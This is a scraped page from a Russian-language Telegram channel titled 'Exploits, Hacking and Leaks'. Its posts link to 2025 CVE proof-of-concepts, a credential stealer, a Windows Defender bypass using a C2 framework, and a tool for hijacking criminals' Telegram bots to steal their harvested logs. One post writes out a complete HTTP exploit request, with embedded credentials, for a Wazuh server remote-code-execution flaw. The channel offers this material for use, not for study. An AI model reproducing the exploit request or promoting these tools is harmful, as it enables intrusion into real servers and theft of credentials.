Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
Вот вам и лол
*
LOLC2
👍32🔥11😱7
BlackBasta Chat Logs
*
У ransomВарщиков протек matrix сервак
🔥23
This media is not supported in your browser
VIEW IN TELEGRAM
Украсть у Бота !
Помните админы каналов всегда боялись добавлять в чЯты ботов ?
Правильно боялись (ID рано или поздно всплывет, или набрутят или etc).
Но ладно если просто антирекламный бот в открытом чате, а если это Ransom BOT или LOGS BOT
или Zabbix BOT лол да)))
Телега давно у черношляпников как C&C сервер используется.
Так вот, перехватом ботов занимаются ВСЕ, менты ловят злых шляп, злые шляпы ловят хомяков и получают удобоваримый лог в телегу, более ленивые черные шляпы ловят в подворотне ботов первых шляп, копипастят логи и имеют свой сладкий шекель.
*
Ну так вот, тут один threat hunter имел неосторожность написать софтину, которая автоматизирует большую часть процесса, ты только парсить логи успевай !
*
В ролике все наглядно
*
DownLoad Thы soft (x_)

#telegram #steal #bots #logs
🔥42😱16👍6
CVE-2025-24016
*
RCE in Wazuh server
wazuh-manager version >= 4.4.0
Patched in version >= 4.9.1

POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83

{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}
🔥27😱5👍2
Reverse Engineering Malware Rolling XOR (arm64)
*
Video
👍27😱5🔥1
CVE-2025–27364
*
MITRE Caldera Security Advisory — Remote Code Execution
*
POC
🔥12👍5
Традиционно выражаю спасибо yashechka
Спасибо !
🔥53👍9😱6
Ну и в догонку релиз от красноволосой Лизы
*
key_grab
🔥15👍5
iDRAC to Domain Admin
*
Забавная статья
👍21🔥5
Burp > поиск
scope > домен\поддомен
*
Link to regular
👍31😱1
CVE-2025-21333
*
Windows Hyper-V Zero-Day
*
POC
🔥26👍5😱5
BurpSuite Extension
*
Xkeys
👍17🔥10😱2
RunAs-Stealer
*
3 techniques : Hooking CreateProcessWithLogonW, Smart Keylogging, Remote Debugging
*
download
👍14
CVE-2025–27636
*
Apache Camel
affects versions: 4.10.0-4.10.1, 4.8.0-4.8.4, 3.10.0-3.22.3
POC
👍11🔥6😱2
This media is not supported in your browser
VIEW IN TELEGRAM
Что там нового в Burp Suite Professional 2025.2
🔥50😱8👍3
This media is not supported in your browser
VIEW IN TELEGRAM
Байпасс win defender с помощью Loki c2 выглядит так
🔥32👍4😱1
Tomcat_CVE-2025-24813_RCE.py
7 KB
CVE-2025-24813 Apache Tomcat RCE
*
🔥35😱5👍1
CVE-2025-26319
*
Flowise Open-Source Platform
CVSS 9.8
👍11🔥2